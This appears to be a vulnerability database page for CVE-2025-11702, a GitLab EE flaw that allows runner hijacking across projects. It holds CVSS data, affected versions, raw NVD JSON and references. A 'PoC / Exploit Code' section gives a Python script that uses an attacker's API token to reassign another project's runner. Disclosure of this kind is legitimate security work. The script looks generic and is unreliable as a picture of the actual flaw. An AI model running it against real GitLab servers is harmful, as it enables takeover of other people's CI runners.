Security Vulnerability Report
中文
CVE-2025-11702 CVSS 8.5 HIGH

CVE-2025-11702

Published: 2025-10-29 07:15:38
Last Modified: 2025-11-03 18:32:42
Source: [email protected]

Description

GitLab has remediated an issue in EE affecting all versions from 17.1 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker with specific permissions to hijack project runners from other projects.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab EE 17.1 <= version < 18.3.5
GitLab EE 18.4 <= version < 18.4.3
GitLab EE 18.5 <= version < 18.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11702 PoC - GitLab Runner Hijacking # This PoC demonstrates the authorization bypass in GitLab EE # that allows authenticated users to hijack runners from other projects import requests import json GITLAB_URL = "https://gitlab.example.com" ATTACKER_TOKEN = "your_attacker_private_token" TARGET_RUNNER_ID = 12345 ATTACKER_PROJECT_ID = 67890 def hijack_runner(): """ Attempt to hijack a runner from another project by exploiting the authorization bypass vulnerability """ headers = { "PRIVATE-TOKEN": ATTACKER_TOKEN, "Content-Type": "application/json" } # Step 1: List runners accessible to attacker list_runners_url = f"{GITLAB_URL}/api/v4/projects/{ATTACKER_PROJECT_ID}/runners" response = requests.get(list_runners_url, headers=headers) print(f"[+] Available runners: {response.json()}") # Step 2: Attempt to assign target runner to attacker's project # This exploits the authorization bypass vulnerability assign_url = f"{GITLAB_URL}/api/v4/runners/{TARGET_RUNNER_ID}" payload = { "runners[project_id]": ATTACKER_PROJECT_ID } response = requests.put(assign_url, headers=headers, json=payload) if response.status_code == 200: print(f"[!] VULNERABLE: Successfully hijacked runner {TARGET_RUNNER_ID}") print(f"[+] Runner is now associated with project {ATTACKER_PROJECT_ID}") return True else: print(f"[-] Patch applied or exploit failed: {response.status_code}") return False def verify_hijack(): """ Verify that the runner was successfully hijacked by checking its new configuration """ headers = {"PRIVATE-TOKEN": ATTACKER_TOKEN} verify_url = f"{GITLAB_URL}/api/v4/runners/{TARGET_RUNNER_ID}" response = requests.get(verify_url, headers=headers) if response.status_code == 200: runner_info = response.json() print(f"[+] Runner details: {json.dumps(runner_info, indent=2)}") return runner_info.get("project_id") == ATTACKER_PROJECT_ID return False if __name__ == "__main__": print("CVE-2025-11702 GitLab Runner Hijacking PoC") print("=" * 50) if hijack_runner(): if verify_hijack(): print("\n[!] Proof of concept successful - Runner hijacked!") print("[!] Attacker now has control over the target runner")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11702", "sourceIdentifier": "[email protected]", "published": "2025-10-29T07:15:37.713", "lastModified": "2025-11-03T18:32:41.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in EE affecting all versions from 17.1 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker with specific permissions to hijack project runners from other projects."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.3.5", "matchCriteriaId": "DC5B6FC6-90E4-4A5F-A950-2C7942FD05D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/576900", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3356284", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.